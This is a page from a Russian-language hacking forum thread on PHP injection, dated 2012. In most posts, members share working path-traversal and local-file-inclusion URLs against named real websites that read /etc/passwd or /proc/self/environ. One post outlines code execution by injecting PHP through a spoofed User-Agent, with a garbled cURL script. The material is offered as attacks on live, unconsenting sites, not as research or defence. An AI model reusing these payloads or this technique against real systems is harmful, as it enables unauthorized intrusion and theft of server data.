HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP Иньекции
   
Ответ
Страница 132 из 143 « Первая < 3282122 128 129 130 131 132 133 134 135 136 142 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1311  
Старый 09.06.2012, 21:48
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
http://www.qcivalves.com/index.php?page=/proc/self/environ
 
Ответить с цитированием

  #1312  
Старый 11.06.2012, 17:48
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
Тема стара но имеет место быть...

Цитата:
Сообщение от None  
http://www.
torrentreactor.net
/browse.php?id=../../../../../../../../../../../../etc/passwd
%00
Перепробовал уеву тучу путей, кроме этого файла ничего не смог прочитать.

У кого есть мысли?
 
Ответить с цитированием

  #1313  
Старый 11.06.2012, 21:36
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
http://www.colibri.ge/display/index.php?z=end&company=hotels/vere/index.php?cat=/proc/self/environ

На темной фоне нажать Ctrl+A.
 
Ответить с цитированием

  #1314  
Старый 12.06.2012, 04:06
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию
VY_CMa

Код:
Code:
www.torrentreactor.net/browse.php?id=../../../../../../../../../../../../opt/inweb/sites/torrentreactor/www.torrentreactor.net/avatars/1/4/1/7/1417549.jpg%00
 
Ответить с цитированием

  #1315  
Старый 12.06.2012, 12:19
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
VY_CMa,

http://video.antichat.ru/video/16/
 
Ответить с цитированием

  #1316  
Старый 12.06.2012, 21:51
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
http://itakers.com/index.php?file=../../../proc/self/environ
 
Ответить с цитированием

  #1317  
Старый 13.06.2012, 05:41
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
PR=2

Цитата:
Сообщение от None  
http://www.creacion.ch/index.php?option=com_ckforms&view=ckforms&id=1&Ite mid=10&controller=../../../robots.txt%00
 
Ответить с цитированием

  #1318  
Старый 13.06.2012, 07:58
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию
http://irh.wisc.edu/fellowships.php?menu=../../../etc/passwd
 
Ответить с цитированием

  #1319  
Старый 13.06.2012, 20:42
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
http://www.coregamers.us/index.php?id=../../../proc/self/environ%00

Чистая реализация инжекта похапе-кода в хранилище переменных окружения.

1. Гуглим функции сURL'a.

2. Пять минут пишем на коленке кулхацкерский скрипт GET-запроса c подменой Юзер-Агента и возвратом ответа.

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$get[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$get[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$get[/COLOR][COLOR="#007700"]);

echo([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
3. Запускаем

4. ???

5. PROFIT!!!



Ну, или подменяем Юзер-Агент "на лету", например Tamper Data'ой.
 
Ответить с цитированием

  #1320  
Старый 19.06.2012, 05:56
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию
http://member.realsexdates.com/clsJSPHP.php?cbr=0&phpinc=../../../../../../etc/passwd
 
Ответить с цитированием
Ответ
Страница 132 из 143 « Первая < 3282122 128 129 130 131 132 133 134 135 136 142 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ